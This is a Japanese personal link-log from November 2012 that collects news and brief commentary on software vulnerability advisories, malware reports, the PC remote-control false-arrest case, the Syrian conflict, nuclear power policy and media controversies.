フアン・コール:「ペトレアスの真の失敗はイラクとアフガニスタンの対反乱作戦」 (デモクラシー・ナウ, 11/12)
》 台湾:退役軍人ら「中国スパイ」…8人を拘束・起訴 (毎日, 10/29)
》 出会い目的のメッセージは自動削除、「監視」の声受けミクシィが説明 (Internet Watch, 11/13)。 mixiはメッセージを監視している? (togetter, 11/11) の件。
》 アラブ連盟、「シリア国民連合」をシリア正統代表組織の 1 つとして承認
シリア反体制派の新たな統一組織、アラブ連盟も承認 (ロイター, 11/13)
シリア国民連合を承認 アラブ連盟、正統な代表と アサド政権崩壊後想定 (共同 / 産経, 11/13)
一方、サウジアラビアなどペルシャ湾岸のアラブ6カ国でつくる湾岸協力会議(GCC)は12日、同連合を唯一の正統な代表として承認。GCCのザヤニ事務局長はシリアでの速やかな権力移行のために同連合を支援していくと表明した。
IT億万長者から犯罪容疑者に・・・マカフィー創業者の転落人生 (NAVER まとめ, 6/3) (魚拓 page1、 page2)
マカフィー創業者が殺人容疑で指名手配 (gizmodo, 11/13)。犯罪容疑者から殺人容疑者に。
》 JA2012国際航空宇宙展に於ける各メーカー表明事項-後半-国内メーカー動向編 (アシナガバチの巣作り日記, 10/27)
》 F35ステルス戦闘機、日本が共同製造参入へ (読売, 11/8)
》 中国ステルス戦闘機「殲31」。 例によってどこかで見たようなカタチ。 まぁ、それを言ったら日本のラプ太郎もそうだしねえ。
中國新款匿蹤戰機現身 (mesotw.com, 9/17)
中国瀋飛が開発した第5世代ステルス戦闘機 初飛行に成功 (中国網, 10/31)
J-31中国新型ステルス戦闘機に関する考察補足 (アシナガバチの巣作り日記, 11/9)
中国次世代ステルス戦闘機 展示会で模型公開 (産経, 11/13)
》 高木浩光氏「楽天カード会員は、自分の誕生日・電話番号を「漏洩」させてはいけない」 (togetter, 11/12)
》 【裁判所がついにキレる】Apple、サムスンの訴訟費用全額賠償へ (NAVER まとめ, 11/12)
》 ソフォス、LinuxおよびUNIX向けマルウェア対策製品の最新版「Sophos Anti-Virus for Linux/UNIX version 9」を発表 (Sophos, 11/13)
》 Facebook shuts down Albania Pirate Group, after stolen passwords shared (Sophos, 11/12)
》 仮想パッチの有効性とは (トレンドマイクロ, 11/12)。トレンドマイクロ製品だと、Deep Security や「Trend Micro 脆弱性対策オプション」だそうです。他社製品もあるはず。
》 イスラエル南部の緊張高まる (国連情報誌SUNブログ対応版, 11/13)。ガザ方面。
今回の事態はパレスチナ人民兵がイスラエル領土に対する無差別なロケット砲攻撃を行ったことに端を発するもので、民間人にも死傷者が出ています。このようなガザ地区からの攻撃が4日も連続して行われており、これに対しイスラエル軍は報復のために空爆を行っています。
》 メディア掲載のお知らせ (日本報道検証機構, 11/11)
》 Skypeが16歳の少年の個人情報をIT企業に提供する (gigazine, 11/12)。 「Skypeは裁判所命令を受けずに個人情報を提出した」という部分が問題になっている模様。今では Skype は Microsoft なのだし。
関連: Report: Skype disclosed user data to security firm (H Security, 11/7)
》 ネット接続時間を設定して作業に集中するフリーソフト「InternetOff」 (gigazine, 11/12)
》 総工費360億円、23Tbpsで通信が可能な全長8300kmの光海底ケーブル「SJC」の製造工場&敷設船見学レポート (gigazine, 11/12)
》 社会評論社に著作権侵害なしの決定/太田出版の頒布差し止め仮処分申請却下 (新文化, 11/12)。『完全自殺マニア』の表紙の件。
SA-CORE-2012-003 - Drupal core - Arbitrary PHP code execution and Information disclosure (Drupal, 2012.10.17)。Drupal 7.16 で修正されている。 任意の PHP コードが実行される欠陥 CVE-2012-4553 と、OpenID モジュールから情報漏洩する欠陥 CVE-2012-4554
Bug 871700 - CVE-2012-4564 libtiff: Missing return value check in ppm2tiff leading to heap-buffer overflow when reading a tiff file (Red Hat, 2012.10.30)。 最新の LibTIFF 4.0.3 も影響を受ける模様。 patch が添付されている。 CVE-2012-4564、 JVNDB-2012-005316
Ruby update fixes hash flooding vulnerability (H Security, 2012.11.12)。 Hash-flooding DoS vulnerability for ruby 1.9 (CVE-2012-5371) (ruby-lang.org, 2012.11.10) の件。ruby-1.9.3 patchlevel 327 で修正されている。
JVNDB-2012-005324: Joomla! におけるクリックジャッキング攻撃の脆弱性 (JVN, 2012.11.13)。 Joomla! 2.5.8 で修正されている。CVE-2012-5827
[rt-announce] Security vulnerabilities in RT (bestpractical.com, 2012.10.25)。 RT 3.8.15、RT 4.0.8、RTFM 2.4.5 で修正されている。 CVE-2012-4730 CVE-2012-4731 CVE-2012-4732 CVE-2012-4734 CVE-2012-4735 CVE-2012-4884
JVNDB-2012-005317: 複数の OpenStack 製品の v1 API における保護されていないイメージを削除される脆弱性 (JVN, 2012.11.13)。 CVE-2012-4573
で、上記に対する修正が十分ではなかったため、これが発生したそうで: JVNDB-2012-005323: 複数の OpenStack 製品の v2 API における保護されていないイメージを削除される脆弱性 (JVN, 2012.11.13)。CVE-2012-5482
》 Google Appsの障害はBGPハイジャック? (Geek なぺーじ, 11/9)
》 中国政府、グーグルへのアクセスを12時間の制限後に解除 開催中の中国共産党大会に対する動きを警戒し検閲レベルが上昇 (ComputerWorld.jp, 11/12)
》 結局のところ RDP 7.1をRDP 8.0に更新していいの? (ComputerWorld.jp, 11/12)。RDP 8.0 はいろいろ罠だらけなのですね。
Windows 7およびWindows 8では、ローカルの管理者ユーザー(ローカルのAdministratorsグループのメンバー)には、既定でリモートデスクトップ接続が許可されますが、Windows 7 SP1でRDP 8.0を有効化すると、明示的にRemote Desktop Usersグループに登録されたユーザーやグループでなければ接続できなくなってしまいます。
》 1.7M mobile apps analyzed: Users tracked and put at risk, and it's unjustified (ZDNet, 11/6)。Juniper 調べ。
》 「無料」に潜むエゴアプリの脅威 〜国内スマホアプリの実態:第2弾〜 (トレンドマイクロ セキュリティ blog, 11/9)
》 29万点以上のAndroidアプリが「高リスク」——セキュリティ企業が評価 全アプリの約4分の1が個人データにアクセス、ハッカー攻撃の糸口になる恐れ (ComputerWorld.jp, 11/2)。Bit9 調べ。
》 KaiXin Exploit and Tool Update (Kahu Security, 11/10)
》 世界約220万のホーム・ネットワークが「ZeroAccess」ボットネットに感染 米国単独で68万5,000のホーム・ネットワークが感染 (ComputerWorld.jp, 11/5)
》 DaRK DDoSseR Leads to Gh0st RAT (trendmicro blog, 11/8)
》 Malware Spy Network Targeted Israelis, Palestinians (Kerbs on Security, 11/12)。Xtreme RAT。 関連: イスラエル警察のコンピュータがマルウェアに集団感染 (ITmedia, 11/13)
逗子刺殺、ストーカー適用せず 警察「メールは対象外」 (弁護士 落合洋司 (東京弁護士会) の 「日々是好日」, 11/9)
逗子ストーカー殺人 結婚後の名字・居住市 県警、読み上げ計2回 (弁護士 落合洋司 (東京弁護士会) の 「日々是好日」, 11/12)
そして下手をするとあなたも……
逗子ストーカー殺人事件、Yahoo!知恵袋に残された恐ろしい投稿履歴 (NAVER まとめ, 11/11) (魚拓 page1、 page2)
「ヤフー知恵袋」使って住所特定か?探偵にも依頼…逗子ストーカー殺人事件 (スポーツ報知, 11/11)
逗子ストーカー殺人事件の容疑者がYahoo!知恵袋で情報収集していた (ガジェット通信, 11/11)
》 シンポジウム「出版者の権利とその役割」(2012年11月25日)共催のお知らせ (CCJP, 11/7)。2012.11.25、東京都千代田区、無料。
》 11月1日実施の「出版社の新しい隣接権を考えるシンポジウム」の資料を公開しました (CCJP, 11/8)
》 IPA テクニカルウォッチ フリーメールからの送信が増加傾向に:最近の標的型攻撃メールの傾向と事例分析 (IPA, 10/30)
》 IPA情報セキュリティ標語・ポスター・4コマ漫画コンクール 第8回受賞作品決定 (IPA, 11/8)
》 水産物の放射性物質調査の結果について (水産庁, 11/12 更新)、 水産物の放射性物質調査について(概要) (水産庁, 11/8 更新)
》 シリア情勢(統一反政府組織の設立) (中東の窓, 11/12)
》 50数日で辞任したBBCトップ −救いようがないほどの情報収集能力の欠如 (小林恭子の英国メディア・ウオッチ, 11/11)。 関連:
英国:BBC会長、引責辞任…「元議員が性的暴行」誤報で (毎日, 11/12)
おそらく、誰かが辞任するだろう —BBCとサビルの不祥事 (小林恭子の英国メディア・ウオッチ, 10/24)
遠隔操作ウィルス事件: 犯行声明に見る犯人像と冤罪を生む刑事捜査の問題点 ゲスト:高木浩光氏(情報セキュリティ専門家) (videonews.com, 10/20)
“遠隔操作ウイルス”、その表の顔の1つは「痴漢君(Chikan.exe)」 (Internet Watch, 11/9)
大阪地検、起訴取り消しの男性に直接謝罪 PC遠隔操作 (朝日, 11/9)
「否認は傷口広げる」 誤認逮捕、取り調べの実態報告 (朝日, 11/9)
「真犯人」1度だけミス? 匿名化せず書き込みか 警視庁注目 (産経, 11/10)
パソコン遠隔操作:米に捜査員5人を派遣…合同捜査本部 (毎日, 11/12)
警察庁がサイバー犯罪対策会議 民間の専門家も参加 (朝日, 11/12)
》 Windows 8 セキュリティ特集 #3 ピクチャ パスワード (日本のセキュリティチーム, 11/12)
》 週刊朝日の橋下徹・大阪市長連載記事に関する「朝日新聞社報道と人権委員会」の見解等について(1) (朝日, 11/12)
なお、これに先立ち、本日12日に開催した弊社臨時取締役会で、代表取締役社長・神徳英雄(こうとく・ひでお)の辞任と、その後任として、取締役・篠崎充(しのざき・みつる)の代表取締役社長代行への就任を決めました。また、前週刊朝日編集長の河畠大四(かわばた・だいし)について、停職3ヵ月及び降格とする処分を決めました。このほか、本件記事を担当した副編集長を同じく停職3ヵ月及び降格、弊社の雑誌部門の責任者である雑誌統括兼コンプライアンス担当を停職20日とする、計3人の懲戒処分を決めました。こうした一連の人事・懲戒処分なども合わせて橋下市長にお伝えしました。
社長辞任ですか……。
4.記事チェック段階での問題
10月9日夕刻,本件記事の原稿が佐野氏から担当デスクの手元に届いた。デスクと2人の担当記者は読んだが,編集長の手元に原稿が届いたのは12日昼頃であった。遅れた理由について,デスクは「原稿には秘匿すべき情報提供者らの名前が入っており,そのままでは渡せなかった」と言っている。しかし,編集長は当然すべての情報源を知るべき立場にあり,編集部の責任者にデスクが情報源を伝えないという考えは誤りである。
原稿を読んだ編集長は,部落差別に関連する文章上の問題点をデスクにいくつか指摘し,同時に,雑誌統括に当該原稿をメールで転送した。折り返し雑誌統括は「こんなことを書いていいと思っているのか。掲載できると思っているのか」と編集長と電話で激しくやり合った。雑誌統括からの依頼で原稿を読んだ他部門の社員からも,原稿には多数の問題があるという指摘があった。12日夕刻にも雑誌統括の依頼で原稿を読んだ雑誌編集の経験が長い社員は,「出自が悪い者はろくなやつがいないという考えそのものが誤りだ。完全な差別表現であり,これはダメだ。」という意見を述べている。雑誌統括はこうした意見を編集長に伝え,編集長は,デスクに佐野氏と交渉して直しを検討するよう求めた。佐野氏は当日,テレビのゲストコメンテーターとしての仕事があり,検討が遅れたが,締め切り日である13日夕刻,数点の修正を行った。雑誌統括は,さらに被差別部落の地区の特定その他の削除を強く求めたが訂正されなかった。最後は,編集長が「これは佐野さんの原稿です。これで行かせてください」と押し切った。表紙が12日に校了しており,この段階では掲載中止は困難であった。掲載するか雑誌自体の発行を停止するかという選択であったが,発行停止が検討された形跡は見られない。
こうして16日発売に至った。
例の記事、内部で激論があったが週刊朝日編集長 (当時) が押し切ってしまっていたのですか。十分な社内的合意の下で発行されたわけでは全くなかったと。
編集部内ではこれまで,このようなセンシティブな問題に関する記事掲載の際には,顧問弁護士に助言を求めるリーガルチェックを行うことがあった。しかし,締め切り間際に表現の手直しに追われたため,今回はリーガルチェックを受けることもなく,最後は「時間切れ」の状況で,掲載に至っている。出自が人格を規定しているという誤った考え方を基調とし,主要部分を信憑性が乏しいインタビューで構成していることが問題なのであって,表現の手直しでは解消できる問題ではなかった。編集部としては,その点にいち早く気づき,本件記事の掲載を止めるべきであった。佐野氏から本件記事の原稿が編集部に届いたのは9日夕刻であり,デスクが原稿を直ちに編集長に示していれば,編集長は社内の意見を聞くとともにリーガルチェックを受けることが可能であった。
せっかくのチェック体制を活かせなかったと……。うーむ。
関連:
週刊朝日の橋下徹・大阪市長連載記事に関する「朝日新聞社報道と人権委員会」の見解等について(2) (朝日, 11/12)。『週刊朝日「橋下徹・大阪市長についての連載記事」経緯報告書』と、篠崎新社長のコメント。
週刊朝日の橋下徹・大阪市長連載記事に関する佐野眞一氏のコメント (朝日, 11/12)
》 FreeBSD、x86アーキテクチャにおいて正式にLLVM/Clangへの移行を果たす (slashdot.jp, 11/11)。GNU General Public Virus からの脱出。
》 郷原氏朝倉事件について語る 2012/11/07 (togetter, 11/8)。特捜検察に踏みつぶされた件。
》 広告と判別しづらい手法での出会い系サイト誘導を禁止します (livedoor Blog 開発日誌, 11/9)
最近、広告と判別しづらい手法で出会い系サイトに誘導する行為が複数のブログで見られることが分かりました。
livedoor Blogにおきましては、上記は利用規約違反と判断いたします。
いまいちよくわからない……。どういう状態だと駄目ということなんだろう。
》 mixiはメッセージを監視している? (togetter, 11/11)。まっとうに使うとアカウント消される SNS って……。無意味じゃん。
》 .ieレジストリがクラックを認める報告書を公表 (Geek なぺーじ, 11/12)。Joomla! をヤラれた。
》 SECCON横浜大会 (極楽せきゅあ日記, 11/9)。2012.12.22。
ランサムウェア: 1 日 33,000 ドルを稼ぎ出す手口 (シマンテック, 11/9)
ランサムウェア: 急増する脅威 (シマンテック, 11/9)
》 不明瞭化を始めた Airpush の広告モジュール (シマンテック, 11/4)
最近になって、Airpush モジュールの参照にランダムな英数字の文字列を使うアプリの数が増えています。
com.EtrSnehN.vkBWjQlJ103131.Airpush
com.XdtXq.jjxnz112220.Airpush
この手法を使うアプリの数は、数千件に達しています。
》 グローバルセキュリティエキスパート、「標的型メール訓練サービス」を開始 (ITmedia, 11/8)。「150万円(税別)から」だそうで。
》 AppleとHTCが和解 10年のクロスライセンス契約を締結 (ITmedia, 11/12)。これもサムスン包囲網の一環なのかなあ。
SYM12-016 - Symantec Ghost Solution Suite にメモリ破損の問題 (シマンテック, 2012.10.10)。 Symantec Ghost Solution Suite 2.5.1 + GSS25x_b2620 で対応されている。 CVE-2012-0306
Security issue discovered in TOR client - Update (H Security, 2012.11.08)。Tor では配列のクリアを memset() を使って実施していたのだけど、Visual C++ 2010 で /O2 すると memset() はどこかに消えてしまうんだよねというお話。
Security, security! But do you test it? (PVS-Studio: Static Code Analyzer for C/C++/C++11, 7/11)。 memset() のかわりに RtlSecureZeroMemory() を使おう。
H Security 記事によると、 Tor Browser Bundle 2.2.39-5 に含まれるバイナリでは対応されているっぽい。
JVNDB-2012-005168: AWStats の awredir.pl における脆弱性 (JVN, 2012.11.01)。AWStats 7.1 で修正されている……というのだが、7.1 はまだβ版だ。 CVE-2012-4547
JVNDB-2012-005157: LibTIFF におけるヒープベースのバッファオーバーフローの脆弱性 (JVN, 2012.10.30)。 LibTIFF 4.0.3 で修正されている。 CVE-2012-4447
Cisco Secure Access Control System TACACS+ Authentication Bypass Vulnerability (Cisco, 2012.11.07)
マイクロソフト脆弱性調査アドバイザリ MSVR12-018: Symantec Ghost のメモリ破損により、任意のコードが実行される (Microsoft, 2012.11.21)。SYM12-016 - Symantec Ghost Solution Suite にメモリ破損の問題 (シマンテック, 2012.10.10) の件は Microsoft が発見したようで。
》 原発の40年超運転、容認も…更田・規制委員 (読売, 11/8)。さっそくムラ人が何か言ってますよ。
復興予算は「食べて応援!」CMにも使われていた (KABASAWA FAMILY BLOG, 10/24)
復興予算ではほとんどのキー局で大量のテレビCMが放映された。TOKIOのメンバーが野菜を食べる「食べて応援しよう」のスポットCMは昨年夏に首都圏各局で800回、今年春には全国のテレビ局で1200回放映された。農水省がテレビ局に支払ったCM料は首都圏分で総額7860万円、全国分は8700万円だ。
復興予算で過激派対策費水増し 公安調査庁 調査車両14台、被災地配備1台 (東京, 11/9)。被災地に行ったのはたったの 1/14 。
》 服部よ、君を忘れない 銃撃事件20年 (朝日, 11/6)。神田大介記者は服部剛丈君の同級生。
住友商事、カザフスタンでウラン鉱石の残さを活用したレアアース製造工場が開所 (日経 BP, 11/6)。2013.01〜
アフリカ産石炭の輸入合意へ、安定確保が可能に (読売, 10/27)。2014〜
サハリン─茨城1400キロ、パイプライン構想 (朝日, 11/4)。これは夢物語。
原作: 「戦争と一人の女」 (坂口安吾デジタルミュージアム)。 最近になって、ようやく完全版が読めるようになったみたい。 桜の森の満開の下・白痴 他十二篇 (岩波文庫) にも収録されているそうだ。
近藤ようこによるマンガ版:
近藤ようこさん来社。『戦争と一人の女』絶賛描き下ろし中! (青林工藝舎「アックス」編集部だより, 3/1)
近藤ようこさん、『戦争と一人の女』本日脱稿! (青林工藝舎「アックス」編集部だより, 10/12)
寺脇研プロデュースによる映画版
くだらない映画多すぎる!永瀬正敏、村上淳ら参加「ゆとり教育」推進の元官僚初プロデュース作上映! (シネマトゥデイ, 8/27)
坂口安吾による同名小説の映画化。荒井晴彦と中野太による脚本は、そこに戦中戦後の連続強姦殺人事件である小平事件を絡めて、戦争の悲惨さを強調する。
映画プロデュースに踏み切った理由として寺脇は「要するにくだらない映画が多すぎるんですよ」とキッパリ。さらに「低予算であってもとにかく脚本が良く、きちんと濡れ場もあるロマンポルノのような、とんがった、テレビで放送できないような映画を作りたかった。もともと映画というのはそういうことが出来る媒体だったんですから」と付け加える言葉も挑発的だ。
戦争と一人の女 (Facebook)
時代を駆ける:寺脇研/1 見たい映画、自分の手で (毎日, 7/12)
時代を駆ける:寺脇研/2 戦争とエロスを描く (毎日, 7/13)
時代を駆ける:寺脇研/3 「映画を変える運動だ」 (毎日, 7/14)
時代を駆ける:寺脇研/4 「ゆとり教育」広報マン (毎日, 7/18)
時代を駆ける:寺脇研/5 「学力低下」責任問われ (毎日, 7/19)
時代を駆ける:寺脇研/6 河合隼雄長官と出会う (毎日, 7/20)
時代を駆ける:寺脇研/7止 若者が日本を変える (毎日, 7/21)
冬の原発事故 逃げ道は (朝日, 11/9)。豪雪地帯、逃げようにも逃げられないおそれ。
美浜原発:「放射能、外に出ない」 防災計画見直し、初会議で町長 /福井 (毎日, 11/9)。 何この鳥頭……
美浜町の山口治太郎町長は8日、町の原子力防災計画の見直しを議論する防災会議で、美浜原発について「外に放射能を出すことはないと思っている。(放射性物質が外に漏れない)対策はとれている上で、防災体制を進めていくということをご承知いただきたい」と述べた。
美浜がゴーストタウンにならないとわからないらしい。
シリア情勢(7日) (中東の窓, 11/8)、 シリア情勢{首都攻防戦) (中東の窓, 11/8)。「臼砲」というのは迫撃砲のことみたい。
シリア情勢(8日) (中東の窓, 11/9)
戦車が戦車を砲撃 (ワールド&インテリジェンス, 11/6)
11月5日。アレッポ戦線。自由シリア軍が奪取した戦車が、別の戦車を至近距離で砲撃して破壊しました。一方的な砲撃なので、ちょっとこれだけでは事情がよくわかりませんが、いずれにせよ自由軍が戦車を使いこなしていることはたしかですね。
前エントリーでも自由シリア軍側の戦車の映像を紹介しましたが、もう複数の町で自由軍が戦車を確保したものと思われます。
「情報戦」陰謀論の罠 (ワールド&インテリジェンス, 11/7)
シリア大統領府への攻撃 (ワールド&インテリジェンス, 11/7)。迫撃砲の映像。
首都決戦へ(アラウィ派の脱出始まる) (ワールド&インテリジェンス, 11/8)
そこでちょっと心配なのは、反体制派SNSの論調に、最近、アラウィ派批判が急速に拡散しつつあることです。反体制派の主流派はこれまで、アサド政権が宗派対立に持ち込もうとしたのに対抗し、アラウィ派批判を抑えてきました。それで実際、アラウィ派コミュニティへの直接攻撃の回避に成功してきていたのですが、スンニ派住民が子どもたちまで大量虐殺に遭ったことで、憎悪のエネルギーが急速に膨張しているように感じられます。
自由軍によるアラウィ派民間人の虐殺などといった事態が発生したら、それこそイラク化になるので、革命軍はなんとか踏みとどまっていただきたいと切に願います。
自由シリア軍の戦力強化が進む (ワールド&インテリジェンス, 11/9)
》 大飯原発 活断層問題 規制委HPに「地滑りはダメ」と書いてあると話題に (ざまあみやがれい!, 11/8)。 設計・建設段階の安全規制 安全審査 (原子力規制委員会)
原子力の立地地点はひとことでいえば・・・
・地震、風、津波、地滑りなどにより大きな事故が発生しないと考えられるところ。
・原子力発電所と公衆の居住する区域との間に適切な距離が確保されているところ
ちゃんとわかってるじゃん。とっとと止めようぜ。関連:
大飯原発敷地内、破砕帯の評価を行う有識者会合第2回 11月7日 (togetter, 11/8)
第九回 原子力規制委員会 (原子力規制委員会, 11/7)、議事録
》 脆弱性関連情報の非開示依頼の取下げ申請の結果が返ってきた (葉っぱ日記, 11/6)。full-disclosure にでも投げちゃえば?
》 3大学不認可問題──問われているのは「法の支配」 --- 玉井 克哉 (アゴラ, 11/7)
まず、今回の措置が違法であることについて。
田中大臣の不認可方針は、設置すべきだとする大学設置・学校法人審議会(設置審)の建議を覆して表明されました。設置申請に対する認可・不認可は大臣の権限ではありますが、それは、大臣が個人的な考えで勝手に決めてよいことを意味しません。学校教育法は、大学設置認可に関する判断について、1. 「大学設置基準」という一般的な規範に基づき(同法3条)、2. 設置審に諮問した上で行うと決めています(同法95条、同法施行令43条)。「諮問せよ」と法律が決めているのは、大臣が自分だけの個人的な知識経験で判断してはならない、という趣旨に取るほかありません。それも、大臣が自分のスタッフに個人的に相談するのもダメで、「審議会」という形に組織されたスタッフに相談せよ、と決めているわけです。今回は何の相談もなく審議会の結論を覆したというのですから、この義務に違反します。即ち、違法です。
関連:
田中眞紀子文部科学大臣記者会見録(平成24年11月2日) (文科省)。とんでもない内容をブチ上げた直後の記者の質問がなさけない。
記者)
大臣が、国会答弁に立たれるのは10年ぶりだと思うんですが、抱負といいますか、思うところがございましたら。
誰だこいつ……
真紀子大臣、思い付きで3大学不認可 (ニッカンスポーツ, 11/3)
熊谷千葉市長、真紀子大臣の不認可について穏やかに語る (togetter, 11/5)
再掲・田中文科相による大学新設不認可に対する法的措置についての授業 (togetter, 11/6)
》 Remote Diagnostics with PSR (SANS ISC, 11/)。Windows 7 に標準添付されているツール「Problem Sequence Recorder」の使い方。
》 NFCを使用する際に取り入れるべき習慣 (トレンドマイクロ セキュリティ blog, 11/8)
》 プロ社員たちがクリックをしまくりムービーの再生回数を稼いでくれるサービス「buyral」 (gigazine, 11/8)。ニセサービス。
》 時論公論 「東電社員殺害事件 再審無罪後に残るもの」 (NHK 解説委員室, 11/6)
》 韓国、日本を仮想敵とした軍備増強計画を策定 (環球閑話時事の徒然 IZA見参, 11/8)。敵がいるだけでこんなにおいしい。
》 本当は怖い「ソーシャル・エンジニアリング」 (日経 IT Pro, 11/8)
》 中国人元ハッカーが語る、「ハッカーと中国当局との微妙な距離」 「政府のために働くのは退屈でも 声がかかれば…」 (ComputerWorld.jp, 11/9)。文字どおりの意味で「予備軍」なわけで。
》 Yahoo!の『秘密の「質問」と「答え」』の変更方法 (ockeghemのtumblr, 11/9)
》 シティカード・ダイナースカード、システム統合で不具合多発。匿名希望さん情報ありがとうございます。
システム移行のご案内 (シティカード)、 システム移行のご案内 (ダイナーズクラブ)
移行スケジュール (シティカード)。スケジュールどおりには全く進んでいない模様。
【重要なお知らせ】シティカード オンラインのご利用状況について (シティカード, 10/20)。10/15 の予定が 10/20 に。しかも不具合多数継続と。
ご不便をおかけしている事象・お問い合わせの多い変更点について (シティカード)
》 Webブラウザ上で動作するターミナルエミュレータ「Gate One 1.1」リリース (sourceforge.jp, 11/7)。SSH 対応。
》 警察庁、ファイル共有ソフト「Perfect Dark」の集中取り締まりを実施 (マイナビニュース, 11/9)。11/7〜8 に実施したそうで。19 か所捜索、8 人逮捕。 関連:
共有ソフトでわいせつ動画公開容疑、8人逮捕 (日経, 11/9)
同庁は4人の誤認逮捕を招いたパソコン遠隔操作事件を踏まえ、わいせつ動画の発信者を特定する過程で、民間のセキュリティー会社「ネットエージェント」(東京)に協力を依頼。共同でパソコンの元データなどの解析を進めた結果、遠隔操作ウイルスに感染した形跡がないことを確認した。
「Perfect Dark(PD)」でわいせつ動画を違法配信していた男ら8人を一斉摘発 (gigazine, 11/9)
》 [ゴルゴ13]毎日新聞夕刊に「依頼」掲載 8日朝刊には返答も (マイナビニュース, 11/7)、 [ゴルゴ13]毎日新聞朝刊に依頼の「承諾」広告掲載 (マイナビニュース, 11/8)。 関東版と中部版のみで、関西版にはなかったのね……。
》 Apple、「下までスクロールしないと表示されない」仕掛け付きで控訴審判決に関する文書を再掲載 (slashdot.jp, 11/7)。Apple は糞会社への道を (再び) 着実に歩んでいるなあ。 なんとかなるうちに引き返してほしい。
》 選挙予言者ネイト・シルバーは魔法使いか? 恐らく。そして数量化世界が来ればあなたもなれる (techcrunch, 11/8)
》 素早い意志決定がなぜ間違えやすいのかという理由が明らかに (gigazine, 11/8)。「脳が非常に情報に対し敏感になり、不十分な情報であっても正確であるかのように見えてしまう」
》 グリーとモバゲーを中心に業界団体が発足--DeNAは会見欠席、参加者間に溝も (CNET, 11/8)。一般社団法人 ソーシャルゲーム協会だそうで。
》 犯罪行為として取り扱われるべきと認められるいじめ事案に関する警察への相談・通報について(通知) (文科省, 11/2)。なんじゃこりゃ……。「上記の趣旨」と「下記」が乖離してるじゃん。
》 Twitter、パスワード大量リセット問題でコメント—「一部のアカンウントでリークの疑いがあったが、リセットの対象は多すぎた」 (techcrunch, 11/9)
》 WSUS サーバーに大量の改訂版が同期された (Japan WSUS Support Team Blog, 11/7)
WSUS 3.0 SP2 サーバーへ KB2734608 を適用することで、WSUS クライアントとして Windows 8 / Windows Server 2012 を管理可能になります。
ただし、Windows 8 / Windows Server 2012 はファイルの署名検証が強化されているため、従来の更新プログラム インストーラーをそのまま適用することが出来ません。
その問題を解決するために、既に公開済みの更新プログラムについて、Windows 8 / Windows Server 2012 に対応するようファイルへの署名方法が変更され、改訂版としてリリースされました。
WSUS サーバーが同期対象とする製品、クラス、言語にもよりますが、1,000 - 3,000 程度の改訂版が一度に同期される場合もあります。
また、米国のブログに内容には含まれていませんが、Windows 7 / Windows Server 2008 R2 以前の環境についても、同じ理由で改訂版がリリースされたことを確認しています。 (KB2734608 よりも先にリリースされた KB2720211 は WSUS のセキュリティ機能を強化する修正であり、その強化に対応するため改訂版リリースが必要な更新プログラムもありました。)
》 マイクロソフトのセキュリティのお仕事って? vol.4 〜 TwC 編 (後編) 〜 (日本のセキュリティチーム, 11/8)
》 スマホから操作して空中撮影を可能にする本格トンボ型ロボット (gigazine, 11/9)。15cm、25g。 小鳥にしか見えない高性能な偵察ロボが完成間近! (gizmodo, 2/2) なんて話もあったし、 世の中どんどん攻殻世界に近づいているな。いよいよセボットの時代か。
Adobe Reader X/XIのゼロデイ脆弱性を突くPDFエクスプロイトが出現 闇市場で3万〜5万ドルで売られ、銀行顧客を狙った標的型攻撃に使われているとの報告 (ComputerWorld.jp, 2012.11.09)
このエクスプロイトを使ったGoogle Chrome経由での攻撃は失敗するとのことだ。同氏によると、Chromeは、Adobe Readerコンポーネントの保護機能を提供しているという。
6 件 (緊急 x 4、重要 x 1、警告 x 1) だそうです。IE あり、Office あり (Excel)、.NET Framework あり。十分な時間を確保しませう。
》 拡散予測デマ3度目 九州電力と規制委のバカコラボ「風向き180度」ミス (ざまあみやがれい!, 11/7)
》 感染拡大を意図して設計されたか? 「BKDR_ZACCESS」の特徴とは (トレンドマイクロ セキュリティ blog, 11/7)
》 ゆうちょ銀行の利用者を狙い、不正にポップアップを表示させるマルウェア (エフセキュアブログ, 11/8)。gred アンチウイルスアクセラレータ Free では「Spyware-tpd」として検出するそうです。
SuperPutty。 .NET Framework 2.0 以降が必要。
MTPuTTY (Multi-Tabbed PuTTY)。Native。
》 なんと東大法学部が初の定員割れ法曹志望、公務員志望減少が影響か (弁護士 落合洋司 (東京弁護士会) の 「日々是好日」, 11/7)。そういう時代。
》 セキュリティ専任のエンジニアは300人、グーグルがセキュリティの取り組みを解説 (日経 IT Pro, 11/6)
ファイゲンバウム氏は冒頭、「100年前の人々は現金をベッドの下に隠していたが、現代の人々は現金は持たずに銀行に預けている。それと同じことが情報の分野でも起きる」と語り、ユーザーが手元にデータを保存するよりも、セキュリティ対策が厳重に施されたクラウドにデータを預けた方がセキュリティが高まるという見方を示した。
それは価値観によるからなあ。箪笥預金は、今でもある場所にはあるわけで。 どのような「セキュリティ」を優先したいのかに依存するよなあ。
》 Possible Fake-AV Ads from Doubleclick Servers (SANS ISC, 11/5)。Doubleclick、にせアンチウイルスへご案内。
PC遠隔操作事件 もう「足利」を忘れたのか (産経, 11/6)、落合弁護士のコメント
“遠隔操作”警察庁「裏付け徹底を」 (NHK, 11/7)
誤認逮捕の少年に補償手続き開始 静岡家裁、PC遠隔操作で (共同, 11/8)
補償金額は拘束された日数に応じて支払われ、補償金は拘束1日当たり、最高1万2500円。少年は7月1日に威力業務妨害容疑で神奈川県警に逮捕され、静岡家裁浜松支部が保護観察処分を決めた8月15日まで46日間拘束された。
46 * 12,500 = 575,000円。人生を破壊された代償としては、あまりに安すぎる。 1000 倍くらいにすれば、少しは冤罪が減るのだろうか。
》 祝:名著「金床本」のKindle対応 (ockeghemのtumblr, 11/8)。「Web セキュリティの名著、金床本。だが日本じゃあ二冊目だ」「二冊目?! ならば一冊目は何だ!」……どう読んでも快傑ズバットです本当にありがとうございました。(一家に一冊徳丸本)
》 大統領選でニューヨークタイムズのネイト・シルバーの数理モデル予測が全50州で的中—政治専門家はもはや不要? (techcrunch, 11/8)。そしてシルバー氏を批判した人々は外れまくりだそうで。
New York Timesの選挙予測専門家、ネイト・シルバーは昨夜、大統領選の勝敗を全50州で的中させた。 その一方で、いわゆる政治専門家たちの予想はほとんどが外れた。中には笑うしかないような外れ方をした者もいる。
ネイト・シルバーについてはテレビのゲストに呼ばれる政治専門家が口を揃えて「リベラルに偏った見解」と非難してきた。しかしシルバーは今回も彼の作った数理的予測モデルが古臭い専門家の勘や生半可な統計に基づく推測より圧倒的に優れていたことを証明した。
(中略)
